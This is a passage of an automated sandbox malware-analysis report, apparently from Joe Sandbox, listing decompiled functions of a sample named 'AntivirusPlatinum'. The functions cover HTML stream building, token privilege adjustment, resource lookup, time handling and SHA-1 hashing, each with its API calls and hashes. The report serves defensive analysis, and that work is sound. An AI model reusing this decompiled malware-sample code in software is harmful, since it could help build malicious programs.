                                                                                                                                                  						_t64 = E0040A1EC(_t94 + _t94);
                                                                                                                                                  						 *(_t96 + 0x6c) = _t64;
                                                                                                                                                  						if(_t64 != 0) {
                                                                                                                                                  							_t65 = MultiByteToWideChar(0, 0, _t87, 0xffffffff, _t64, _t94);
                                                                                                                                                  							_t32 =  &(_t87[3]); // 0x3
                                                                                                                                                  							 *((char*)(_t96 + 0x7f)) = _t65 != 0;
                                                                                                                                                  							if(WideCharToMultiByte(0xfde9, 0,  *(_t96 + 0x6c), 0xffffffff, _t32, _t94, 0, 0) == 0) {
                                                                                                                                                  								 *((char*)(_t96 + 0x7f)) = 0;
                                                                                                                                                  							}
                                                                                                                                                  							E0040A205( *(_t96 + 0x6c));
                                                                                                                                                  							if( *((intOrPtr*)(_t96 + 0x7f)) == 0) {
                                                                                                                                                  								 *((char*)( *((intOrPtr*)(_t96 + 0x5c)))) = 0x5f;
                                                                                                                                                  							} else {
                                                                                                                                                  								 *_t87 = 0xef;
                                                                                                                                                  								_t87[1] = 0xbb;
                                                                                                                                                  								_t87[2] = 0xbf;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t48 = _t96 + 0x64;
                                                                                                                                                  					__imp__CreateStreamOnHGlobal(_t87, 1, _t48);
                                                                                                                                                  					if(_t48 >= 0) {
                                                                                                                                                  						_t95 =  *((intOrPtr*)(_t96 + 0x60));
                                                                                                                                                  						 *((char*)(_t95 + 0x15)) = E004064FD( *((intOrPtr*)(_t95 + 0xc)),  *(_t96 + 0x64));
                                                                                                                                                  						_t62 =  *(_t96 + 0x64);
                                                                                                                                                  						_t48 =  *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                                                                                                  					}
                                                                                                                                                  					goto L26;
                                                                                                                                                  				}
                                                                                                                                                  				 *((char*)(_t96 + 0x73)) = 0;
                                                                                                                                                  				if(( *(_t96 - 0x2c) & 0x0000ffff) < 0x7ce) {
                                                                                                                                                  					goto L5;
                                                                                                                                                  				}
                                                                                                                                                  				goto L4;
                                                                                                                                                  			}


















                                                                                                                                                  0x00406861
                                                                                                                                                  0x0040686f
                                                                                                                                                  0x00406874
                                                                                                                                                  0x00406879
                                                                                                                                                  0x00406a10
                                                                                                                                                  0x00406a16
                                                                                                                                                  0x00406a16
                                                                                                                                                  0x00406889
                                                                                                                                                  0x0040688f
                                                                                                                                                  0x00406895
                                                                                                                                                  0x0040689f
                                                                                                                                                  0x004068ad
                                                                                                                                                  0x004068b6
                                                                                                                                                  0x004068bc
                                                                                                                                                  0x004068c0
                                                                                                                                                  0x00406a0f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00406a0f
                                                                                                                                                  0x004068ca
                                                                                                                                                  0x004068d1
                                                                                                                                                  0x004068db
                                                                                                                                                  0x004068eb
                                                                                                                                                  0x004068eb
                                                                                                                                                  0x004068ef
                                                                                                                                                  0x004068f5
                                                                                                                                                  0x004068fd
                                                                                                                                                  0x00406905
                                                                                                                                                  0x00406918
                                                                                                                                                  0x0040691b
                                                                                                                                                  0x0040691b
                                                                                                                                                  0x00406920
                                                                                                                                                  0x00406923
                                                                                                                                                  0x0040692e
                                                                                                                                                  0x00406931
                                                                                                                                                  0x00406928
                                                                                                                                                  0x0040692b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040692b
                                                                                                                                                  0x0040693d
                                                                                                                                                  0x00406944
                                                                                                                                                  0x00406946
                                                                                                                                                  0x00406948
                                                                                                                                                  0x0040694b
                                                                                                                                                  0x00406955
                                                                                                                                                  0x0040694d
                                                                                                                                                  0x00406950
                                                                                                                                                  0x00406950
                                                                                                                                                  0x0040695a
                                                                                                                                                  0x00406962
                                                                                                                                                  0x0040696a
                                                                                                                                                  0x0040696a
                                                                                                                                                  0x00406972
                                                                                                                                                  0x00406978
                                                                                                                                                  0x00406978
                                                                                                                                                  0x00406980
                                                                                                                                                  0x00406986
                                                                                                                                                  0x0040698b
                                                                                                                                                  0x00406990
                                                                                                                                                  0x00406999
                                                                                                                                                  0x004069a4
                                                                                                                                                  0x004069ad
                                                                                                                                                  0x004069bf
                                                                                                                                                  0x004069c1
                                                                                                                                                  0x004069c1
                                                                                                                                                  0x004069c7
                                                                                                                                                  0x004069cf
                                                                                                                                                  0x004069e1
                                                                                                                                                  0x004069d1
                                                                                                                                                  0x004069d1
                                                                                                                                                  0x004069d4
                                                                                                                                                  0x004069d8
                                                                                                                                                  0x004069d8
                                                                                                                                                  0x004069cf
                                                                                                                                                  0x00406990
                                                                                                                                                  0x004069e4
                                                                                                                                                  0x004069eb
                                                                                                                                                  0x004069f3
                                                                                                                                                  0x004069f8
                                                                                                                                                  0x00406a03
                                                                                                                                                  0x00406a06
                                                                                                                                                  0x00406a0c
                                                                                                                                                  0x00406a0c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004069f3
                                                                                                                                                  0x004068e1
                                                                                                                                                  0x004068e9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenA.KERNEL32(?,?), ref: 004068A2
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,-00000100), ref: 004068B6
                                                                                                                                                  • GetVersionExA.KERNEL32(?), ref: 004068D1
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,-00000100,00000000,00000000,?,?,<html>,00000006,00000000,<html>), ref: 00406999
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,000000FF,00000003,-00000100,00000000,00000000), ref: 004069B7
                                                                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,00000000,?,?,<html>,00000006,00000000,<html>), ref: 004069EB
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharGlobalMultiWide$AllocCreateStreamVersionlstrlen
                                                                                                                                                  • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$about:blank$utf-8"></head>
                                                                                                                                                  • API String ID: 918982468-1117646011
                                                                                                                                                  • Opcode ID: f4b66ca56256074701a77dfd2d7c8255339cab005059f91be7c8ef823ca1bce2
                                                                                                                                                  • Instruction ID: 5c5e2e41cef04153fcc374feb770f7bcd7630f055a3a5a69099902d12bd6b0ed
                                                                                                                                                  • Opcode Fuzzy Hash: f4b66ca56256074701a77dfd2d7c8255339cab005059f91be7c8ef823ca1bce2
                                                                                                                                                  • Instruction Fuzzy Hash: 22519571500388AEDB21EF748C45DAE7FA9AF06714F15412BF966A32D2C678CC24DB29
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E004034AA() {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                  				int _t11;
                                                                                                                                                  				char _t31;
                                                                                                                                                  
                                                                                                                                                  				_t31 =  *0x41486e; // 0x0
                                                                                                                                                  				if(_t31 == 0) {
                                                                                                                                                  					 *0x41486e = 1;
                                                                                                                                                  					_t11 = OpenProcessToken(GetCurrentProcess(), 0x20,  &_v8);
                                                                                                                                                  					if(_t11 != 0) {
                                                                                                                                                  						_v24.PrivilegeCount = 1;
                                                                                                                                                  						_v12 = 2;
                                                                                                                                                  						if(LookupPrivilegeValueA(0, "SeSecurityPrivilege",  &(_v24.Privileges)) != 0 && AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0) != 0 && GetLastError() == 0) {
                                                                                                                                                  							 *0x41486d = 1;
                                                                                                                                                  						}
                                                                                                                                                  						if(LookupPrivilegeValueA(0, "SeRestorePrivilege",  &(_v24.Privileges)) != 0) {
                                                                                                                                                  							AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
                                                                                                                                                  						}
                                                                                                                                                  						return CloseHandle(_v8);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t11;
                                                                                                                                                  			}








                                                                                                                                                  0x004034b3
                                                                                                                                                  0x004034b9
                                                                                                                                                  0x004034c5
                                                                                                                                                  0x004034d3
                                                                                                                                                  0x004034db
                                                                                                                                                  0x004034ef
                                                                                                                                                  0x004034f6
                                                                                                                                                  0x00403507
                                                                                                                                                  0x00403524
                                                                                                                                                  0x00403524
                                                                                                                                                  0x00403539
                                                                                                                                                  0x00403546
                                                                                                                                                  0x00403546
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403552
                                                                                                                                                  0x004034db
                                                                                                                                                  0x00403555

                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000020,?,00000000,004037BD,?,00000000,?,?), ref: 004034CC
                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004034D3
                                                                                                                                                  • LookupPrivilegeValueA.ADVAPI32 ref: 004034FD
                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 00403514
                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040351A
                                                                                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 00403535
                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 00403546
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040354B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Token$AdjustLookupPrivilegePrivilegesProcessValue$CloseCurrentErrorHandleLastOpen
                                                                                                                                                  • String ID: @Mhv$SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                                  • API String ID: 2567606174-3604700855
                                                                                                                                                  • Opcode ID: c949ee787aeeb01e211e777db34c6ab15c62baebe83aeb3191ba4c1195d95a36
                                                                                                                                                  • Instruction ID: 4d87bf4ab330366511297bf3b21dea1e654d34ca96b66c7a981cdcd40eee38cc
                                                                                                                                                  • Opcode Fuzzy Hash: c949ee787aeeb01e211e777db34c6ab15c62baebe83aeb3191ba4c1195d95a36
                                                                                                                                                  • Instruction Fuzzy Hash: 9F116DB1900219BEEB00EBA49D84EFF7BACEB44349F044076A601E21A1D7B59F04CB78
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                  			E004096AF(void* __ecx) {
                                                                                                                                                  				char _v1028;
                                                                                                                                                  				struct HINSTANCE__* _t5;
                                                                                                                                                  				struct HRSRC__* _t6;
                                                                                                                                                  				signed int _t10;
                                                                                                                                                  				char _t12;
                                                                                                                                                  				void* _t16;
                                                                                                                                                  
                                                                                                                                                  				_t16 = __ecx;
                                                                                                                                                  				_t5 = GetModuleHandleA(0);
                                                                                                                                                  				_t17 = "RTL";
                                                                                                                                                  				_t6 = FindResourceA(_t5, "RTL", 5);
                                                                                                                                                  				if(_t6 == 0) {
                                                                                                                                                  					E00409553(_t16, "LTR",  &_v1028, 1, "LTR");
                                                                                                                                                  					_t10 = E0040A4E9( &_v1028, _t17);
                                                                                                                                                  					asm("sbb al, al");
                                                                                                                                                  					_t12 =  ~_t10 + 1;
                                                                                                                                                  					 *((char*)(_t16 + 0x10)) = _t12;
                                                                                                                                                  					return _t12;
                                                                                                                                                  				}
                                                                                                                                                  				 *((char*)(_t16 + 0x10)) = 1;
                                                                                                                                                  				return _t6;
                                                                                                                                                  			}









                                                                                                                                                  0x004096bc
                                                                                                                                                  0x004096be
                                                                                                                                                  0x004096c6
                                                                                                                                                  0x004096cd
                                                                                                                                                  0x004096d5
                                                                                                                                                  0x004096ef
                                                                                                                                                  0x004096fc
                                                                                                                                                  0x00409703
                                                                                                                                                  0x00409705
                                                                                                                                                  0x00409707
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409707
                                                                                                                                                  0x004096d7
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,00414C88), ref: 004096BE
                                                                                                                                                  • FindResourceA.KERNEL32(00000000,RTL,00000005), ref: 004096CD
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FindHandleModuleResource
                                                                                                                                                  • String ID: LTR$RTL
                                                                                                                                                  • API String ID: 3537982541-719208805
                                                                                                                                                  • Opcode ID: c85929189a2336619c142bfb5adf14b24fcf8cab46fe22709d53f16226de1815
                                                                                                                                                  • Instruction ID: 12f79db75577d25306824e15d06a1a3014e73688b613185c72924c9a3f94fbbd
                                                                                                                                                  • Opcode Fuzzy Hash: c85929189a2336619c142bfb5adf14b24fcf8cab46fe22709d53f16226de1815
                                                                                                                                                  • Instruction Fuzzy Hash: F9F0B4726002147ADA1066759C1AFE72A6CDB45704F04417AB309E61C2D7F89A55C7A9
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040E0E1(void* __ecx) {
                                                                                                                                                  				struct _FILETIME _v12;
                                                                                                                                                  				struct _SYSTEMTIME _v28;
                                                                                                                                                  				void* _t11;
                                                                                                                                                  				void* _t14;
                                                                                                                                                  
                                                                                                                                                  				_t14 = __ecx;
                                                                                                                                                  				GetSystemTime( &_v28);
                                                                                                                                                  				SystemTimeToFileTime( &_v28,  &_v12);
                                                                                                                                                  				return E0040DF79(_t11, _t14,  &_v12);
                                                                                                                                                  			}







                                                                                                                                                  0x0040e0ec
                                                                                                                                                  0x0040e0ee
                                                                                                                                                  0x0040e0fc
                                                                                                                                                  0x0040e10f

                                                                                                                                                  APIs
                                                                                                                                                  • GetSystemTime.KERNEL32(?), ref: 0040E0EE
                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040E0FC
                                                                                                                                                    • Part of subcall function 0040DF79: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,01000000,00000000,?,?,?,?), ref: 0040DF8A
                                                                                                                                                    • Part of subcall function 0040DF79: FileTimeToSystemTime.KERNEL32(?,?), ref: 0040DF98
                                                                                                                                                    • Part of subcall function 0040DF79: SystemTimeToFileTime.KERNEL32(?,?), ref: 0040E00D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Time$File$System$Local
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2859370177-0
                                                                                                                                                  • Opcode ID: 0fbcf173760a5192ea96601a717504cfae41435c603bcbb0cce835998907240a
                                                                                                                                                  • Instruction ID: b976fda33143c74ac370e146003494d8e758708e9995241362427bb7c2108887
                                                                                                                                                  • Opcode Fuzzy Hash: 0fbcf173760a5192ea96601a717504cfae41435c603bcbb0cce835998907240a
                                                                                                                                                  • Instruction Fuzzy Hash: 21D012B290011E7BCF00E7F4DD46CCE7BBCEA44204F000062AA02F3041EA74E6458BE5
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                  			E0040D4FF(void* __ecx, void* _a4, signed int* _a8, signed int _a12) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				signed int _v12;
                                                                                                                                                  				intOrPtr* _v16;
                                                                                                                                                  				signed int* _v20;
                                                                                                                                                  				void _v40;
                                                                                                                                                  				signed int* _t235;
                                                                                                                                                  				signed int _t243;
                                                                                                                                                  				signed int _t254;
                                                                                                                                                  				signed int _t263;
                                                                                                                                                  				signed int _t273;
                                                                                                                                                  				void* _t275;
                                                                                                                                                  				signed int _t285;
                                                                                                                                                  				signed int _t287;
                                                                                                                                                  				signed int _t291;
                                                                                                                                                  				signed int _t297;
                                                                                                                                                  				signed int* _t311;
                                                                                                                                                  				void* _t331;
                                                                                                                                                  				intOrPtr _t332;
                                                                                                                                                  				signed int _t336;
                                                                                                                                                  				signed int* _t339;
                                                                                                                                                  				signed int* _t340;
                                                                                                                                                  				signed int* _t344;
                                                                                                                                                  				signed int _t345;
                                                                                                                                                  				signed int* _t349;
                                                                                                                                                  				void* _t350;
                                                                                                                                                  				signed int _t387;
                                                                                                                                                  				signed int* _t389;
                                                                                                                                                  				signed int* _t397;
                                                                                                                                                  				signed int* _t405;
                                                                                                                                                  				signed int* _t409;
                                                                                                                                                  				signed int* _t412;
                                                                                                                                                  				signed int* _t417;
                                                                                                                                                  				void* _t418;
                                                                                                                                                  
                                                                                                                                                  				if(_a12 == 0) {
                                                                                                                                                  					_t285 = _a8;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t285 = 0x41f970;
                                                                                                                                                  					E0040A2B6(__ecx, 0x41f970, _a8, 0x40);
                                                                                                                                                  				}
                                                                                                                                                  				if( *0x41f968 == 0) {
                                                                                                                                                  					_t332 = 0;
                                                                                                                                                  					_t417 = 0x41f32c;
                                                                                                                                                  					do {
                                                                                                                                                  						_t4 = _t332 + 1; // 0x1
                                                                                                                                                  						asm("cdq");
                                                                                                                                                  						_t387 = 5;
                                                                                                                                                  						_t9 = _t332 + 2; // 0x2
                                                                                                                                                  						 *((intOrPtr*)(_t417 - 4)) = _t332;
                                                                                                                                                  						 *_t417 = _t4 % _t387;
                                                                                                                                                  						asm("cdq");
                                                                                                                                                  						_t15 = _t332 + 3; // 0x3
                                                                                                                                                  						_t417 =  &(_t417[5]);
                                                                                                                                                  						 *(_t417 - 0x10) = _t9 % _t387;
                                                                                                                                                  						asm("cdq");
                                                                                                                                                  						_t21 = _t332 + 4; // 0x4
                                                                                                                                                  						 *(_t417 - 0xc) = _t15 % _t387;
                                                                                                                                                  						asm("cdq");
                                                                                                                                                  						 *(_t417 - 8) = _t21 % _t387;
                                                                                                                                                  						if(_t332 == 0) {
                                                                                                                                                  							_t332 = 4;
                                                                                                                                                  						} else {
                                                                                                                                                  							_t332 = _t332 - 1;
                                                                                                                                                  						}
                                                                                                                                                  					} while (_t417 < 0x41f96c);
                                                                                                                                                  					 *0x41f968 = 1;
                                                                                                                                                  				}
                                                                                                                                                  				_t287 = 5;
                                                                                                                                                  				memcpy( &_v40, _a4, _t287 << 2);
                                                                                                                                                  				_t235 = 0x41f334;
                                                                                                                                                  				_a12 = _t285;
                                                                                                                                                  				do {
                                                                                                                                                  					_t389 = _a12;
                                                                                                                                                  					asm("ror ecx, 0x8");
                                                                                                                                                  					asm("rol edx, 0x8");
                                                                                                                                                  					_t291 =  *_t389 & 0xff00ff00 |  *_t389 & 0x00ff00ff;
                                                                                                                                                  					 *_t389 = _t291;
                                                                                                                                                  					_t33 = _t235 - 8; // 0x0
                                                                                                                                                  					_t336 =  *(_t418 +  *_t235 * 4 - 0x24);
                                                                                                                                                  					_t37 = _t235 - 4; // 0x0
                                                                                                                                                  					_a12 = _a12 + 4;
                                                                                                                                                  					_a8 = _t418 +  *_t33 * 4 - 0x24;
                                                                                                                                                  					_t47 =  &(_t235[1]); // 0x0
                                                                                                                                                  					_v12 = _t418 +  *_t47 * 4 - 0x24;
                                                                                                                                                  					_t52 = _t235 - 0xc; // 0x0
                                                                                                                                                  					_v8 = _t336;
                                                                                                                                                  					asm("rol esi, 0x5");
                                                                                                                                                  					 *_v12 =  *_v12 + (( *(_t418 +  *_t37 * 4 - 0x24) ^ _t336) &  *_a8 ^ _v8) +  *((intOrPtr*)(_t418 +  *_t52 * 4 - 0x24)) + _t291 + 0x5a827999;
                                                                                                                                                  					asm("ror dword [ecx], 0x2");
                                                                                                                                                  					_t235 =  &(_t235[5]);
                                                                                                                                                  					_t339 = 0x41f474;
                                                                                                                                                  				} while (_t235 < 0x41f474);
                                                                                                                                                  				_a12 = 0x10;
                                                                                                                                                  				do {
                                                                                                                                                  					_t65 = _a12 - 3; // 0xd
                                                                                                                                                  					_t294 = _t65;
                                                                                                                                                  					_t397 = _t285 + (_a12 & 0x0000000f) * 4;
                                                                                                                                                  					_t68 = _t294 - 5; // 0x8
                                                                                                                                                  					_t71 = _t294 + 5; // 0x12
                                                                                                                                                  					_t243 =  *(_t285 + (_t68 & 0x0000000f) * 4) ^  *(_t285 + (_t71 & 0x0000000f) * 4) ^  *(_t285 + (_t65 & 0x0000000f) * 4) ^  *_t397;
                                                                                                                                                  					asm("rol eax, 1");
                                                                                                                                                  					 *_t397 = _t243;
                                                                                                                                                  					_t76 = _t339 - 8; // 0x0
                                                                                                                                                  					_t297 =  *(_t418 +  *_t339 * 4 - 0x24);
                                                                                                                                                  					_t80 = _t339 - 4; // 0x0
                                                                                                                                                  					_a8 = _t418 +  *_t76 * 4 - 0x24;
                                                                                                                                                  					_t88 =  &(_t339[1]); // 0x0
                                                                                                                                                  					_v8 = _t418 +  *_t88 * 4 - 0x24;
                                                                                                                                                  					_t93 = _t339 - 0xc; // 0x0
                                                                                                                                                  					_v12 = _t297;
                                                                                                                                                  					asm("rol esi, 0x5");
                                                                                                                                                  					 *_v8 =  *_v8 + (( *(_t418 +  *_t80 * 4 - 0x24) ^ _t297) &  *_a8 ^ _v12) +  *((intOrPtr*)(_t418 +  *_t93 * 4 - 0x24)) + _t243 + 0x5a827999;
                                                                                                                                                  					asm("ror dword [eax], 0x2");
                                                                                                                                                  					_a12 = _a12 + 1;
                                                                                                                                                  					_t339 =  &(_t339[5]);
                                                                                                                                                  				} while (_t339 < 0x41f4c4);
                                                                                                                                                  				_a12 = 0x14;
                                                                                                                                                  				_t340 = 0x41f4c4;
                                                                                                                                                  				do {
                                                                                                                                                  					_t108 = _a12 - 3; // 0x11
                                                                                                                                                  					_t300 = _t108;
                                                                                                                                                  					_t405 = _t285 + (_a12 & 0x0000000f) * 4;
                                                                                                                                                  					_t111 = _t300 - 5; // 0xc
                                                                                                                                                  					_t112 = _t300 + 5; // 0x16
                                                                                                                                                  					_t254 =  *(_t285 + (_t111 & 0x0000000f) * 4) ^  *(_t285 + (_t112 & 0x0000000f) * 4) ^  *(_t285 + (_t108 & 0x0000000f) * 4) ^  *_t405;
                                                                                                                                                  					asm("rol eax, 1");
                                                                                                                                                  					 *_t405 = _t254;
                                                                                                                                                  					_t119 = _t340 - 8; // 0x0
                                                                                                                                                  					_a8 = _t418 +  *_t119 * 4 - 0x24;
                                                                                                                                                  					_t124 =  &(_t340[1]); // 0x0
                                                                                                                                                  					_v8 = _t418 +  *_t124 * 4 - 0x24;
                                                                                                                                                  					_t129 = _t340 - 0xc; // 0x0
                                                                                                                                                  					_t133 = _t340 - 4; // 0x0
                                                                                                                                                  					asm("rol esi, 0x5");
                                                                                                                                                  					_t143 =  *((intOrPtr*)(_t418 +  *_t129 * 4 - 0x24)) + _t254 + 0x6ed9eba1; // 0x6fd9eba1
                                                                                                                                                  					 *_v8 =  *_v8 + ( *(_t418 +  *_t133 * 4 - 0x24) ^  *(_t418 +  *_t340 * 4 - 0x24) ^  *_a8) + _t143;
                                                                                                                                                  					asm("ror dword [ecx], 0x2");
                                                                                                                                                  					_a12 = _a12 + 1;
                                                                                                                                                  					_t340 =  &(_t340[5]);
                                                                                                                                                  				} while (_t340 < 0x41f654);
                                                                                                                                                  				_t311 = 0x41f650;
                                                                                                                                                  				_a12 = 0x28;
                                                                                                                                                  				_a8 = 0x41f650;
                                                                                                                                                  				do {
                                                                                                                                                  					_t149 = _a12 - 3; // 0x25
                                                                                                                                                  					_t341 = _t149;
                                                                                                                                                  					_t409 = _t285 + (_a12 & 0x0000000f) * 4;
                                                                                                                                                  					_t152 = _t341 - 5; // 0x20
                                                                                                                                                  					_t155 = _t341 + 5; // 0x2a
                                                                                                                                                  					_t263 =  *(_t285 + (_t152 & 0x0000000f) * 4) ^  *(_t285 + (_t155 & 0x0000000f) * 4) ^  *(_t285 + (_t149 & 0x0000000f) * 4) ^  *_t409;
                                                                                                                                                  					asm("rol eax, 1");
                                                                                                                                                  					 *_t409 = _t263;
                                                                                                                                                  					_t160 = _t311 - 4; // 0x0
                                                                                                                                                  					_t161 =  &(_t311[2]); // 0x0
                                                                                                                                                  					_t344 = _t418 +  *_t160 * 4 - 0x24;
                                                                                                                                                  					_v20 = _t344;
                                                                                                                                                  					_t345 =  *_t344;
                                                                                                                                                  					_v16 = _t418 +  *_t161 * 4 - 0x24;
                                                                                                                                                  					_t173 = _t311 - 8; // 0x0
                                                                                                                                                  					_t174 =  &(_t311[1]); // 0x0
                                                                                                                                                  					_v12 = _t345;
                                                                                                                                                  					asm("rol edi, 0x5");
                                                                                                                                                  					_t185 =  *((intOrPtr*)(_t418 +  *_t173 * 4 - 0x24)) + _t263 - 0x70e44324; // -1877230372
                                                                                                                                                  					 *_v16 =  *_v16 + ( *(_t418 +  *_t174 * 4 - 0x24) & (_t345 |  *(_t418 +  *_t311 * 4 - 0x24)) | _v12 &  *(_t418 +  *_t311 * 4 - 0x24)) + _t185;
                                                                                                                                                  					asm("ror dword [eax], 0x2");
                                                                                                                                                  					_a12 = _a12 + 1;
                                                                                                                                                  					_t311 =  &(_a8[5]);
                                                                                                                                                  					_a8 = _t311;
                                                                                                                                                  				} while (_t311 < 0x41f7e0);
                                                                                                                                                  				_a12 = 0x3c;
                                                                                                                                                  				_t349 = 0x41f7e4;
                                                                                                                                                  				do {
                                                                                                                                                  					_t193 = _a12 - 3; // 0x39
                                                                                                                                                  					_t319 = _t193;
                                                                                                                                                  					_t412 = _t285 + (_a12 & 0x0000000f) * 4;
                                                                                                                                                  					_t196 = _t319 - 5; // 0x34
                                                                                                                                                  					_t197 = _t319 + 5; // 0x3e
                                                                                                                                                  					_t273 =  *(_t285 + (_t196 & 0x0000000f) * 4) ^  *(_t285 + (_t197 & 0x0000000f) * 4) ^  *(_t285 + (_t193 & 0x0000000f) * 4) ^  *_t412;
                                                                                                                                                  					asm("rol eax, 1");
                                                                                                                                                  					 *_t412 = _t273;
                                                                                                                                                  					_t204 = _t349 - 8; // 0x0
                                                                                                                                                  					_a8 = _t418 +  *_t204 * 4 - 0x24;
                                                                                                                                                  					_t209 =  &(_t349[1]); // 0x0
                                                                                                                                                  					_v16 = _t418 +  *_t209 * 4 - 0x24;
